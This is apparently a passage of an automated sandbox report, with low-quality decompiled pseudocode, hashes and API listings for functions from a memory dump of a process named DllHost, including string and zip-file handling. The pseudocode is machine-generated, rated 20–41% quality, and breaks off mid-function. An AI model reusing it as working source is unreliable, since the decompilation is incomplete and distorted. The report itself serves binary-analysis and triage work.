                                                                                                                                                              			E00007FF77FF7191C47E0(void* __edi, long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, void* __r8, long long _a32) {
				signed int _v40;
				signed long long _v368;
				signed long long _v376;
				signed long long _v384;
				void* _v392;
				void* __rsi;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t32;
				signed long long _t44;
				signed long long _t45;
				signed long long _t60;
				intOrPtr* _t73;
				intOrPtr* _t74;
				void* _t76;

				_a32 = __rbx;
				_t44 =  *0x192190a0; // 0x590452ce5669
				_t45 = _t44 ^ _t76 - 0x00000190;
				_v40 = _t45;
				_t73 = __rdx;
				_t74 = __rcx;
				if ( *((long long*)( *__rcx + 0x48)) - 0x10 < 0) goto 0x191c481b;
				_t22 = E00007FF77FF7191C7270( *((intOrPtr*)( *__rcx + 0x30))); // executed
				_t30 = _t22;
				if (_t22 != 0) goto 0x191c4906;
				_v384 = _t45;
				_v376 = _t45;
				_v368 = _t45;
				E00007FF77FF7191C0720( &_v384,  *((intOrPtr*)( *__rcx + 0x30)));
				_t25 = E00007FF77FF7191C7C20( *((intOrPtr*)(_t74 + 8))); // executed
				if (_t30 - 1 < 0) goto 0x191c489a;
				E00007FF77FF7191C5300(_t25, __rdx, _v384, _t74, _t25); // executed
				if ( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4)) + _t73 + 0x10)) != 0) goto 0x191c4895;
				if (_t30 <= 0) goto 0x191c489a;
				goto 0x191c4853;
				E00007FF77FF7191BAEA0(_t25, _t73); // executed
				_t60 = _v384;
				if (_t60 == 0) goto 0x191c48db;
				if (_v368 - _t60 - 0x1000 < 0) goto 0x191c48d6;
				if (_t60 -  *((intOrPtr*)(_t60 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c4900;
				0x191d23d0();
				return E00007FF77FF7191D23B0(0xffffffff, _t32, _v40 ^ _t76 - 0x00000190);
			}



















                                                                                                                                                              0x7ff7191c47e0
                                                                                                                                                              0x7ff7191c47ef
                                                                                                                                                              0x7ff7191c47f6
                                                                                                                                                              0x7ff7191c47f9
                                                                                                                                                              0x7ff7191c4804
                                                                                                                                                              0x7ff7191c4807
                                                                                                                                                              0x7ff7191c4816
                                                                                                                                                              0x7ff7191c481f
                                                                                                                                                              0x7ff7191c4824
                                                                                                                                                              0x7ff7191c4828
                                                                                                                                                              0x7ff7191c4830
                                                                                                                                                              0x7ff7191c4835
                                                                                                                                                              0x7ff7191c483a
                                                                                                                                                              0x7ff7191c484e
                                                                                                                                                              0x7ff7191c4864
                                                                                                                                                              0x7ff7191c486f
                                                                                                                                                              0x7ff7191c487c
                                                                                                                                                              0x7ff7191c488d
                                                                                                                                                              0x7ff7191c4891
                                                                                                                                                              0x7ff7191c4893
                                                                                                                                                              0x7ff7191c489d
                                                                                                                                                              0x7ff7191c48a3
                                                                                                                                                              0x7ff7191c48ab
                                                                                                                                                              0x7ff7191c48bf
                                                                                                                                                              0x7ff7191c48d4
                                                                                                                                                              0x7ff7191c48d6
                                                                                                                                                              0x7ff7191c48ff

                                                                                                                                                              APIs
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7191C4900
                                                                                                                                                                • Part of subcall function 00007FF7191C1330: __std_exception_copy.LIBVCRUNTIME ref: 00007FF7191C135F
                                                                                                                                                                • Part of subcall function 00007FF7191D41CC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7191D0F5E), ref: 00007FF7191D4210
                                                                                                                                                                • Part of subcall function 00007FF7191D41CC: _purecall.KERNELBASE(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7191D0F5E), ref: 00007FF7191D4256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHeader__std_exception_copy_invalid_parameter_noinfo_noreturn_purecall
                                                                                                                                                              • String ID: opening internal file '$' in zip$Error
                                                                                                                                                              • API String ID: 445863741-3498895160
                                                                                                                                                              • Opcode ID: 043186c84df61d7ac0cdebc5dbbd0c182d723cc9b6fcbbd4713c7c84c7536fe2
                                                                                                                                                              • Instruction ID: b514c0628d7bb43de364f2ba50ffeb8220a226aca1523b7aebda2a73101cc3e7
                                                                                                                                                              • Opcode Fuzzy Hash: 043186c84df61d7ac0cdebc5dbbd0c182d723cc9b6fcbbd4713c7c84c7536fe2
                                                                                                                                                              • Instruction Fuzzy Hash: 2241C421B1DE8640FA10BF25F4902BAA371EF88BE8F804131EA5D477D6DE2CD5CA9750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C8870 Relevance: 6.3, APIs: 4, Instructions: 283COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 41%
                                                                                                                                                              			E00007FF77FF7191C8870(long long __rbx, long long __rcx, long long __rdx, long long __rsi, void* __r15) {
				void* __rdi;
				void* __rbp;
				void* __r14;
				void* _t91;
				void* _t114;
				void* _t126;
				void* _t142;
				signed long long _t155;
				char* _t166;
				char* _t187;
				long long _t190;
				void* _t200;
				intOrPtr _t223;
				intOrPtr _t226;
				intOrPtr _t231;
				intOrPtr _t234;
				intOrPtr _t240;
				intOrPtr _t243;
				intOrPtr _t246;
				void* _t249;
				intOrPtr* _t250;
				intOrPtr* _t254;
				long long _t255;
				void* _t257;
				void* _t258;
				void* _t260;
				signed long long _t261;
				long long _t263;
				void* _t272;
				void* _t273;
				long long _t274;

				_t276 = __r15;
				 *((long long*)(_t260 + 0x18)) = __rbx;
				 *((long long*)(_t260 + 0x20)) = __rsi;
				_t258 = _t260 - 0x47;
				_t261 = _t260 - 0xd0;
				_t155 =  *0x192190a0; // 0x590452ce5669
				 *(_t258 + 0x37) = _t155 ^ _t261;
				_t250 = __rdx;
				_t254 = __rcx;
				r14d = 0;
				 *((long long*)(_t258 - 0x39)) = _t274;
				 *((long long*)(_t258 - 0x29)) = __rdx;
				 *((long long*)(_t258 - 0x21)) = __rcx;
				 *((char*)(_t258 - 0x39)) = r14d;
				_t263 =  *((intOrPtr*)(__rdx + 0x10));
				if (_t263 == 0) goto 0x191c897b;
				_t190 =  *0x19219010; // 0x1
				if (0xffffffff - _t263 - _t190 < 0) goto 0x191c8c7f;
				if ( *((intOrPtr*)(__rdx + 0x18)) - 0x10 < 0) goto 0x191c88f2;
				_t160 =  >=  ?  *0x19219000 : 0x19219000;
				 *((long long*)(_t261 + 0x30)) = _t190;
				 *((long long*)(_t261 + 0x28)) =  >=  ?  *0x19219000 : 0x19219000;
				 *((long long*)(_t261 + 0x20)) = _t263;
				_t14 = _t258 - 0x49; // 0x8348c78b40245c8b
				_t15 = _t258 - 0x19; // 0x7ff7191c86ff
				E00007FF77FF7191BD1B0(__rbx, _t15, __rdx,  *((intOrPtr*)(__rdx)), _t274, _t249);
				_t16 = _t258 - 0x21; // 0x44c7482024448948
				_t223 =  *_t16;
				if (_t223 - 0x10 < 0) goto 0x191c8963;
				_t17 = _t258 - 0x39; // 0x4850ec83485340cc
				if (_t223 + 1 - 0x1000 < 0) goto 0x191c895e;
				if ( *_t17 -  *((intOrPtr*)( *_t17 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c8c91;
				0x191d23d0();
				asm("movups xmm0, [ebp-0x19]");
				asm("movups [ebp-0x39], xmm0");
				asm("movups xmm1, [ebp-0x9]");
				asm("movups [ebp-0x29], xmm1");
				_t19 = _t258 - 0x21; // 0x44c7482024448948
				_t20 = _t258 - 0x29; // 0xc0334024448948c4
				_t226 =  *_t20;
				if ( *((long long*)(_t254 + 0x18)) - 0x10 < 0) goto 0x191c8988;
				_t255 =  *((intOrPtr*)(_t254 + 0x10));
				if (_t255 -  *_t19 - _t226 > 0) goto 0x191c89c3;
				_t166 = _t255 + _t226;
				 *((long long*)(_t258 - 0x29)) = _t166;
				_t25 = _t258 - 0x39; // 0x7ff7191c86df
				_t26 = _t258 - 0x39; // 0x4850ec83485340cc
				_t185 =  >=  ?  *_t26 : _t25;
				_t186 = ( >=  ?  *_t26 : _t25) + _t226;
				E00007FF77FF7191D4380();
				 *((char*)(_t255 + ( >=  ?  *_t26 : _t25) + _t226)) = 0;
				goto 0x191c89d7;
				 *((long long*)(_t261 + 0x20)) = _t255;
				r8d = 0;
				_t29 = _t258 - 0x39; // 0x7ff7191c86df
				E00007FF77FF7191BCA80(_t29, _t255, _t250,  *_t254, _t274, __r15);
				_t30 = _t258 - 0x39; // 0x7ff7191c86df
				_t32 = _t258 - 0x39; // 0x4850ec83485340cc
				_t198 =  >=  ?  *_t32 : _t30;
				_t33 = _t258 - 0x19; // 0x7ff7191c86ff, executed
				_t91 = E00007FF77FF7191DCF94(0xf,  *_t14 & 0x000000ff, _t166, ( >=  ?  *_t26 : _t25) + _t226,  >=  ?  *_t32 : _t30, _t33, _t250, _t255,  *_t254); // executed
				_t126 = _t91 - 0xffffffff;
				if (_t126 == 0) goto 0x191c8a22;
				if (_t126 == 0) goto 0x191c8a22;
				_t35 = _t258 - 0x39; // 0x7ff7191c86df
				_t37 = _t258 - 0x39; // 0x4850ec83485340cc
				_t200 =  >=  ?  *_t37 : _t35;
				if (E00007FF77FF7191DD174() != 0) goto 0x191c8a22;
				goto 0x191c8c1b;
				if ( *((long long*)(_t250 + 0x10)) == 0) goto 0x191c8a57;
				if (E00007FF77FF7191C9090(_t250) == 0) goto 0x191c8a50;
				if ( *((long long*)(_t250 + 0x18)) - 0x10 < 0) goto 0x191c8a3f;
				if (E00007FF77FF7191DD174() == 0) goto 0x191c8a57;
				goto 0x191c8c1b;
				_t40 = _t258 - 0x39; // 0x7ff7191c86df
				_t41 = _t258 - 0x19; // 0x7ff7191c86ff
				E00007FF77FF7191C90F0(_t114, ( >=  ?  *_t26 : _t25) + _t226, _t41, _t40, _t255);
				_t187 = _t166;
				_t42 = _t258 - 0x39; // 0x7ff7191c86df
				if (_t42 == _t187) goto 0x191c8ad9;
				_t43 = _t258 - 0x21; // 0x44c7482024448948
				_t231 =  *_t43;
				if (_t231 - 0x10 < 0) goto 0x191c8aab;
				_t44 = _t258 - 0x39; // 0x4850ec83485340cc
				if (_t231 + 1 - 0x1000 < 0) goto 0x191c8aa6;
				if ( *_t44 -  *((intOrPtr*)( *_t44 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c8c85;
				0x191d23d0();
				 *((long long*)(_t258 - 0x29)) = _t274;
				 *((long long*)(_t258 - 0x21)) = 0xf;
				 *((char*)(_t258 - 0x39)) = 0;
				asm("movups xmm0, [ebx]");
				asm("movups [ebp-0x39], xmm0");
				asm("movups xmm1, [ebx+0x10]");
				asm("movups [ebp-0x29], xmm1");
				 *((long long*)(_t187 + 0x10)) = _t274;
				 *((long long*)(_t187 + 0x18)) = 0xf;
				 *_t187 = 0;
				_t51 = _t258 - 1; // 0x24548b48d8b60f00
				_t234 =  *_t51;
				if (_t234 - 0x10 < 0) goto 0x191c8b14;
				_t52 = _t258 - 0x19; // 0x89480000000f3824
				if (_t234 + 1 - 0x1000 < 0) goto 0x191c8b0f;
				if ( *_t52 -  *((intOrPtr*)( *_t52 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c8c85;
				0x191d23d0();
				_t54 = _t258 - 0x39; // 0x7ff7191c86df
				_t55 = _t258 + 0x17; // 0x7ff7191c872f
				E00007FF77FF7191C8CA0(2, _t114, _t55, _t54, _t255, _t255, _t272, _t273, _t274, _t276);
				if ( *((long long*)(_t258 + 0x27)) == 0) goto 0x191c8bb8;
				_t57 = _t258 + 0x17; // 0x7ff7191c872f
				_t59 = _t258 + 0x17; // 0x1000fa8148c18b
				_t210 =  >=  ?  *_t59 : _t57;
				_t60 = _t258 - 0x19; // 0x7ff7191c86ff
				_t142 = E00007FF77FF7191DCF94(0xf, 2,  *_t52 -  *((intOrPtr*)( *_t52 - 8)) + 0xfffffff8, _t187,  >=  ?  *_t59 : _t57, _t60,  *_t250, _t255,  *_t254) - 0xffffffff;
				if (_t142 == 0) goto 0x191c8b5b;
				asm("bt ax, 0xf");
				if (_t142 < 0) goto 0x191c8bb8;
				asm("bt ax, 0xe");
				if (_t142 < 0) goto 0x191c8bb8;
				 *((long long*)(_t258 - 0x19)) = _t274;
				 *((long long*)(_t258 - 1)) = 0xf;
				 *((long long*)(_t258 - 9)) = _t274;
				 *((char*)(_t258 - 0x19)) = 0;
				_t66 = _t258 - 0x19; // 0x7ff7191c86ff
				_t67 = _t258 + 0x17; // 0x7ff7191c872f
				E00007FF77FF7191C8870(_t187, _t67, _t66, _t255, _t276);
				_t68 = _t258 - 1; // 0x24548b48d8b60f00
				_t240 =  *_t68;
				if (_t240 - 0x10 < 0) goto 0x191c8bb8;
				_t69 = _t258 - 0x19; // 0x89480000000f3824
				if (_t240 + 1 - 0x1000 < 0) goto 0x191c8bb3;
				if ( *_t69 -  *((intOrPtr*)( *_t69 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c8c8b;
				0x191d23d0();
				_t71 = _t258 - 0x39; // 0x7ff7191c86df
				_t73 = _t258 - 0x39; // 0x4850ec83485340cc
				_t215 =  >=  ?  *_t73 : _t71;
				E00007FF77FF7191DD094(0, 0xf,  *_t69 -  *((intOrPtr*)( *_t69 - 8)) + 0xfffffff8, _t187,  >=  ?  *_t73 : _t71, _t240 + 0x28,  *_t250, _t255,  *_t254, _t257);
				_t76 = _t258 + 0x2f; // 0x1b771ff88348f8c0
				_t243 =  *_t76;
				if (_t243 - 0x10 < 0) goto 0x191c8c0b;
				_t77 = _t258 + 0x17; // 0x1000fa8148c18b
				if (_t243 + 1 - 0x1000 < 0) goto 0x191c8c06;
				if ( *_t77 -  *((intOrPtr*)( *_t77 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c8c91;
				0x191d23d0();
				 *((long long*)(_t258 + 0x27)) = _t274;
				 *((long long*)(_t258 + 0x2f)) = 0xf;
				 *((char*)(_t258 + 0x17)) = 0;
				_t82 = _t258 - 0x21; // 0x44c7482024448948
				_t246 =  *_t82;
				if (_t246 - 0x10 < 0) goto 0x191c8c52;
				_t83 = _t258 - 0x39; // 0x4850ec83485340cc
				if (_t246 + 1 - 0x1000 < 0) goto 0x191c8c4d;
				if ( *_t83 -  *((intOrPtr*)( *_t83 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c8c79;
				0x191d23d0();
				_t85 = _t258 + 0x37; // 0xc3b60f00009c7ce8
				return E00007FF77FF7191D23B0(0, 0xf,  *_t85 ^ _t261);
			}


































                                                                                                                                                              0x7ff7191c8870
                                                                                                                                                              0x7ff7191c8870
                                                                                                                                                              0x7ff7191c8875
                                                                                                                                                              0x7ff7191c887e
                                                                                                                                                              0x7ff7191c8883
                                                                                                                                                              0x7ff7191c888a
                                                                                                                                                              0x7ff7191c8894
                                                                                                                                                              0x7ff7191c8898
                                                                                                                                                              0x7ff7191c889b
                                                                                                                                                              0x7ff7191c889e
                                                                                                                                                              0x7ff7191c88a1
                                                                                                                                                              0x7ff7191c88a8
                                                                                                                                                              0x7ff7191c88b1
                                                                                                                                                              0x7ff7191c88b5
                                                                                                                                                              0x7ff7191c88bc
                                                                                                                                                              0x7ff7191c88c3
                                                                                                                                                              0x7ff7191c88c9
                                                                                                                                                              0x7ff7191c88e0
                                                                                                                                                              0x7ff7191c88ed
                                                                                                                                                              0x7ff7191c8901
                                                                                                                                                              0x7ff7191c8909
                                                                                                                                                              0x7ff7191c890e
                                                                                                                                                              0x7ff7191c8913
                                                                                                                                                              0x7ff7191c891b
                                                                                                                                                              0x7ff7191c891f
                                                                                                                                                              0x7ff7191c8923
                                                                                                                                                              0x7ff7191c8928
                                                                                                                                                              0x7ff7191c8928
                                                                                                                                                              0x7ff7191c8930
                                                                                                                                                              0x7ff7191c8935
                                                                                                                                                              0x7ff7191c8943
                                                                                                                                                              0x7ff7191c8958
                                                                                                                                                              0x7ff7191c895e
                                                                                                                                                              0x7ff7191c8963
                                                                                                                                                              0x7ff7191c8967
                                                                                                                                                              0x7ff7191c896b
                                                                                                                                                              0x7ff7191c896f
                                                                                                                                                              0x7ff7191c8973
                                                                                                                                                              0x7ff7191c8977
                                                                                                                                                              0x7ff7191c8977
                                                                                                                                                              0x7ff7191c8983
                                                                                                                                                              0x7ff7191c8988
                                                                                                                                                              0x7ff7191c8995
                                                                                                                                                              0x7ff7191c8997
                                                                                                                                                              0x7ff7191c899b
                                                                                                                                                              0x7ff7191c899f
                                                                                                                                                              0x7ff7191c89a7
                                                                                                                                                              0x7ff7191c89a7
                                                                                                                                                              0x7ff7191c89ac
                                                                                                                                                              0x7ff7191c89b8
                                                                                                                                                              0x7ff7191c89bd
                                                                                                                                                              0x7ff7191c89c1
                                                                                                                                                              0x7ff7191c89c3
                                                                                                                                                              0x7ff7191c89c8
                                                                                                                                                              0x7ff7191c89ce
                                                                                                                                                              0x7ff7191c89d2
                                                                                                                                                              0x7ff7191c89d7
                                                                                                                                                              0x7ff7191c89e0
                                                                                                                                                              0x7ff7191c89e0
                                                                                                                                                              0x7ff7191c89e5
                                                                                                                                                              0x7ff7191c89e9
                                                                                                                                                              0x7ff7191c89ee
                                                                                                                                                              0x7ff7191c89f1
                                                                                                                                                              0x7ff7191c89fd
                                                                                                                                                              0x7ff7191c89ff
                                                                                                                                                              0x7ff7191c8a08
                                                                                                                                                              0x7ff7191c8a08
                                                                                                                                                              0x7ff7191c8a19
                                                                                                                                                              0x7ff7191c8a1d
                                                                                                                                                              0x7ff7191c8a27
                                                                                                                                                              0x7ff7191c8a33
                                                                                                                                                              0x7ff7191c8a3a
                                                                                                                                                              0x7ff7191c8a4e
                                                                                                                                                              0x7ff7191c8a52
                                                                                                                                                              0x7ff7191c8a57
                                                                                                                                                              0x7ff7191c8a5b
                                                                                                                                                              0x7ff7191c8a5f
                                                                                                                                                              0x7ff7191c8a64
                                                                                                                                                              0x7ff7191c8a67
                                                                                                                                                              0x7ff7191c8a6e
                                                                                                                                                              0x7ff7191c8a70
                                                                                                                                                              0x7ff7191c8a70
                                                                                                                                                              0x7ff7191c8a78
                                                                                                                                                              0x7ff7191c8a7d
                                                                                                                                                              0x7ff7191c8a8b
                                                                                                                                                              0x7ff7191c8aa0
                                                                                                                                                              0x7ff7191c8aa6
                                                                                                                                                              0x7ff7191c8aab
                                                                                                                                                              0x7ff7191c8aaf
                                                                                                                                                              0x7ff7191c8ab7
                                                                                                                                                              0x7ff7191c8abb
                                                                                                                                                              0x7ff7191c8abe
                                                                                                                                                              0x7ff7191c8ac2
                                                                                                                                                              0x7ff7191c8ac6
                                                                                                                                                              0x7ff7191c8aca
                                                                                                                                                              0x7ff7191c8ace
                                                                                                                                                              0x7ff7191c8ad6
                                                                                                                                                              0x7ff7191c8ad9
                                                                                                                                                              0x7ff7191c8ad9
                                                                                                                                                              0x7ff7191c8ae1
                                                                                                                                                              0x7ff7191c8ae6
                                                                                                                                                              0x7ff7191c8af4
                                                                                                                                                              0x7ff7191c8b09
                                                                                                                                                              0x7ff7191c8b0f
                                                                                                                                                              0x7ff7191c8b14
                                                                                                                                                              0x7ff7191c8b18
                                                                                                                                                              0x7ff7191c8b1c
                                                                                                                                                              0x7ff7191c8b27
                                                                                                                                                              0x7ff7191c8b2d
                                                                                                                                                              0x7ff7191c8b36
                                                                                                                                                              0x7ff7191c8b36
                                                                                                                                                              0x7ff7191c8b3b
                                                                                                                                                              0x7ff7191c8b44
                                                                                                                                                              0x7ff7191c8b47
                                                                                                                                                              0x7ff7191c8b4d
                                                                                                                                                              0x7ff7191c8b52
                                                                                                                                                              0x7ff7191c8b54
                                                                                                                                                              0x7ff7191c8b59
                                                                                                                                                              0x7ff7191c8b5b
                                                                                                                                                              0x7ff7191c8b5f
                                                                                                                                                              0x7ff7191c8b67
                                                                                                                                                              0x7ff7191c8b6b
                                                                                                                                                              0x7ff7191c8b6f
                                                                                                                                                              0x7ff7191c8b73
                                                                                                                                                              0x7ff7191c8b77
                                                                                                                                                              0x7ff7191c8b7d
                                                                                                                                                              0x7ff7191c8b7d
                                                                                                                                                              0x7ff7191c8b85
                                                                                                                                                              0x7ff7191c8b8a
                                                                                                                                                              0x7ff7191c8b98
                                                                                                                                                              0x7ff7191c8bad
                                                                                                                                                              0x7ff7191c8bb3
                                                                                                                                                              0x7ff7191c8bb8
                                                                                                                                                              0x7ff7191c8bc1
                                                                                                                                                              0x7ff7191c8bc1
                                                                                                                                                              0x7ff7191c8bc6
                                                                                                                                                              0x7ff7191c8bd0
                                                                                                                                                              0x7ff7191c8bd0
                                                                                                                                                              0x7ff7191c8bd8
                                                                                                                                                              0x7ff7191c8bdd
                                                                                                                                                              0x7ff7191c8beb
                                                                                                                                                              0x7ff7191c8c00
                                                                                                                                                              0x7ff7191c8c06
                                                                                                                                                              0x7ff7191c8c0b
                                                                                                                                                              0x7ff7191c8c0f
                                                                                                                                                              0x7ff7191c8c17
                                                                                                                                                              0x7ff7191c8c1b
                                                                                                                                                              0x7ff7191c8c1b
                                                                                                                                                              0x7ff7191c8c23
                                                                                                                                                              0x7ff7191c8c28
                                                                                                                                                              0x7ff7191c8c36
                                                                                                                                                              0x7ff7191c8c4b
                                                                                                                                                              0x7ff7191c8c4d
                                                                                                                                                              0x7ff7191c8c55
                                                                                                                                                              0x7ff7191c8c78

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: 227d752c5f75fb3fa81a11f694a744cb27b78267bc99d195b6af96c803a3754e
                                                                                                                                                              • Instruction ID: 452ea0429b9996f4a08d5da2b9a29bd2e8e2b0c709a2d177cf4e7007cbf478d7
                                                                                                                                                              • Opcode Fuzzy Hash: 227d752c5f75fb3fa81a11f694a744cb27b78267bc99d195b6af96c803a3754e
                                                                                                                                                              • Instruction Fuzzy Hash: 9AC18062B24E4185FB10EF65E0843EC6372AB447BCF804631DE6D12ADADF78D0DA9365
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B43F0 Relevance: 6.2, APIs: 4, Instructions: 228COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                              			E00007FF77FF7191B43F0(long long __rbx, void* __rcx, void* __rdx, long long __r8) {
				void* __rdi;
				void* _t76;
				void* _t78;
				void* _t79;
				void* _t80;
				signed long long _t106;
				long long _t110;
				long long* _t127;
				intOrPtr _t159;
				intOrPtr _t165;
				long long _t168;
				intOrPtr _t171;
				void* _t172;
				intOrPtr _t178;
				void* _t181;
				void* _t182;
				intOrPtr _t183;
				void* _t185;
				void* _t188;
				void* _t189;
				void* _t191;
				intOrPtr _t201;
				void* _t207;
				void* _t208;
				void* _t209;
				char* _t210;
				long long _t212;

				 *((long long*)(_t191 + 0x20)) = __rbx;
				_t189 = _t191 - 0x37;
				_t106 =  *0x192190a0; // 0x590452ce5669
				 *(_t189 + 0x27) = _t106 ^ _t191 - 0x000000d0;
				_t210 = __r8;
				_t182 = __rdx;
				 *((long long*)(_t189 - 0x59)) = __r8;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x39], xmm0");
				asm("movups [ebp-0x29], xmm0");
				asm("movups [ebp-0x19], xmm0");
				asm("movups [ebp-0x9], xmm0");
				asm("movups [ebp+0x7], xmm0");
				asm("movups [ebp+0x17], xmm0");
				r15d = 0;
				 *((long long*)(_t189 - 0x79)) = _t212;
				 *((long long*)(_t189 - 0x69)) = _t212;
				 *((long long*)(_t189 - 0x61)) = 0xf;
				 *((intOrPtr*)(_t189 - 0x79)) = r15b;
				if ( *((intOrPtr*)(__rcx + 0xffffffff)) != r15b) goto 0x191b4460;
				E00007FF77FF7191BA9A0(_t189 - 0x79, __rcx, 0);
				E00007FF77FF7191C0F20(_t106 ^ _t191 - 0x000000d0, __rbx, _t189 - 0x39, _t189 - 0x79, __r8, _t208); // executed
				_t159 =  *((intOrPtr*)(_t189 - 0x61));
				if (_t159 - 0x10 < 0) goto 0x191b44c2;
				if (_t159 + 1 - 0x1000 < 0) goto 0x191b44bd;
				_t110 =  *((intOrPtr*)(_t189 - 0x79)) -  *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x79)) - 8)) + 0xfffffff8;
				if (_t110 - 0x1f > 0) goto 0x191b473b;
				0x191d23d0(_t209, _t181, _t185, _t188);
				 *((long long*)(_t189 - 0x69)) = _t212;
				 *((long long*)(_t189 - 0x61)) = 0xf;
				 *((char*)(_t189 - 0x79)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x51], xmm0");
				 *((long long*)(_t189 - 0x41)) = _t110;
				E00007FF77FF7191C4230(_t110, _t189 - 0x39, _t189 - 0x51); // executed
				if ( *((intOrPtr*)(_t189 - 0x51)) ==  *((intOrPtr*)(_t189 - 0x49))) goto 0x191b458c;
				 *((long long*)(_t189 - 0x79)) = _t212;
				 *((long long*)(_t189 - 0x69)) = _t212;
				 *((long long*)(_t189 - 0x61)) = 0xf;
				 *((char*)(_t189 - 0x79)) = 0;
				if ( *((char*)(_t182 + 0xffffffff)) != 0) goto 0x191b4520;
				E00007FF77FF7191BA9A0(_t189 - 0x79, _t182, 0);
				E00007FF77FF7191C45A0(_t78, _t79, _t80, _t189 - 0x39,  *((intOrPtr*)(_t189 - 0x51)), _t189 - 0x79, _t207, _t208); // executed
				_t165 =  *((intOrPtr*)(_t189 - 0x61));
				if (_t165 - 0x10 < 0) goto 0x191b4583;
				if (_t165 + 1 - 0x1000 < 0) goto 0x191b457e;
				if ( *((intOrPtr*)(_t189 - 0x79)) -  *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x79)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b4741;
				0x191d23d0();
				goto 0x191b44f5;
				E00007FF77FF7191C31D0(_t189 - 0x39, _t182);
				_t201 =  *((intOrPtr*)(_t189 - 0x51));
				if (_t201 == 0) goto 0x191b46bc;
				_t183 =  *((intOrPtr*)(_t189 - 0x49));
				if (_t201 == _t183) goto 0x191b465d;
				_t127 = _t201 + 0x38;
				_t168 =  *_t127;
				if (_t168 - 0x10 < 0) goto 0x191b45ee;
				if (_t168 + 1 - 0x1000 < 0) goto 0x191b45e9;
				if ( *((intOrPtr*)(_t127 - 0x18)) -  *((intOrPtr*)( *((intOrPtr*)(_t127 - 0x18)) - 8)) - 8 - 0x1f > 0) goto 0x191b472f;
				0x191d23d0();
				 *((long long*)(_t127 - 8)) = _t212;
				 *_t127 = 0xf;
				 *((char*)(_t127 - 0x18)) = 0;
				_t171 =  *((intOrPtr*)(_t127 - 0x20));
				if (_t171 - 0x10 < 0) goto 0x191b4638;
				_t172 = _t171 + 1;
				if (_t172 - 0x1000 < 0) goto 0x191b4633;
				if ( *((intOrPtr*)(_t127 - 0x38)) -  *((intOrPtr*)( *((intOrPtr*)(_t127 - 0x38)) - 8)) - 8 - 0x1f > 0) goto 0x191b472f;
				0x191d23d0();
				 *((long long*)(_t127 - 0x28)) = _t212;
				 *((long long*)(_t127 - 0x20)) = 0xf;
				 *((char*)(_t127 - 0x38)) = 0;
				if (_t127 + 0x70 - 0x38 != _t183) goto 0x191b45b4;
				if (((_t172 + 0x27 >> 5) + (_t172 + 0x27 >> 5 >> 0x3f)) * 0x70 - 0x1000 < 0) goto 0x191b46a8;
				if ( *((intOrPtr*)(_t189 - 0x51)) -  *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x51)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b472f;
				0x191d23d0();
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp-0x51], xmm0");
				 *((long long*)(_t189 - 0x41)) = _t212;
				_t76 = E00007FF77FF7191C15D0(_t127 + 0x70, _t189 - 0x39, _t183, _t212);
				_t178 =  *((intOrPtr*)(_t210 + 0x18));
				if (_t178 - 0x10 < 0) goto 0x191b46fc;
